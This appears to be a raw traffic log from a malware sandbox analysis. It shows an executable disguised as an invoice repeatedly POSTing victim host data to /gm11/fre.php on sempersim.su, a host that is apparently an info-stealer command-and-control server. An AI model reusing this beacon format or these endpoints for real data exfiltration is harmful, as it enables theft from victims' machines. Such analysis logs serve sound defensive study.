                                Nov 30, 2022 00:54:49.052315950 CET149INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:51 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.34970195.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:12.581435919 CET124OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:12.644942999 CET124OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:14.085145950 CET125INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:16 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                20192.168.2.34971995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:49.641508102 CET149OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:49.705965042 CET150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:51.280994892 CET151INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:53 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                21192.168.2.34972095.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:51.608520985 CET152OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:51.668618917 CET152OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:53.259308100 CET152INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:55 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                22192.168.2.34972195.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:53.572062016 CET153OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:53.635982037 CET154OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:54.418787003 CET154INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:57 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                23192.168.2.34972295.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:54.732178926 CET155OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:54.789618969 CET155OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:56.166551113 CET155INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:58 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                24192.168.2.34972395.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:56.463103056 CET156OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:56.526835918 CET156OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:57.894669056 CET157INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:00 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                25192.168.2.34972495.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:58.184483051 CET157OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:58.242203951 CET158OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:59.594971895 CET158INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:02 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                26192.168.2.34972595.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:59.930840969 CET159OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:59.996385098 CET159OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:01.390775919 CET159INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:04 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                27192.168.2.34972695.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:01.673862934 CET160OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:01.730465889 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:03.204140902 CET161INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:05 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                28192.168.2.34972795.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:03.486766100 CET162OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:03.552114010 CET162OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:04.982566118 CET162INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:07 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                29192.168.2.34972895.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:05.285201073 CET163OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:05.356775045 CET163OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:06.759571075 CET164INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:09 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.34970295.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:54:14.871390104 CET125OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:54:14.939245939 CET126OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:54:16.469088078 CET126INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:54:19 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                30192.168.2.34972995.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:07.068053961 CET164OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:07.142729998 CET165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:08.539654016 CET165INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:11 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                31192.168.2.34973095.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:08.823724985 CET166OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:08.887696981 CET166OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:10.337694883 CET166INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:13 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                32192.168.2.34973195.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:10.632750988 CET167OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:10.697035074 CET168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:12.166821003 CET168INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:14 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                33192.168.2.34973295.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:12.457820892 CET169OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:12.519223928 CET169OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:13.950021982 CET169INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:16 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                34192.168.2.34973395.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:14.244291067 CET170OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:14.300803900 CET170OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:15.751744032 CET171INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:18 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                35192.168.2.34973495.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:16.065951109 CET171OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:16.123481035 CET172OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:17.565495014 CET172INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:20 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                36192.168.2.34973595.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:17.863853931 CET173OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
                                Nov 30, 2022 00:55:17.920523882 CET173OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 35 00 31 00 38 00 32 00 39 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                Data Ascii: (ckav.ruhardz051829DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                Nov 30, 2022 00:55:19.347023010 CET173INHTTP/1.0 404 Not Found
                                Date: Tue, 29 Nov 2022 23:55:22 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                X-Powered-By: PHP/5.4.16
                                Status: 404 Not Found
                                Content-Length: 23
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                37192.168.2.34973695.213.216.20280C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                TimestampkBytes transferredDirectionData
                                Nov 30, 2022 00:55:19.643476009 CET174OUTPOST /gm11/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: sempersim.su
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: B40C7D1C
                                Content-Length: 163
                                Connection: close
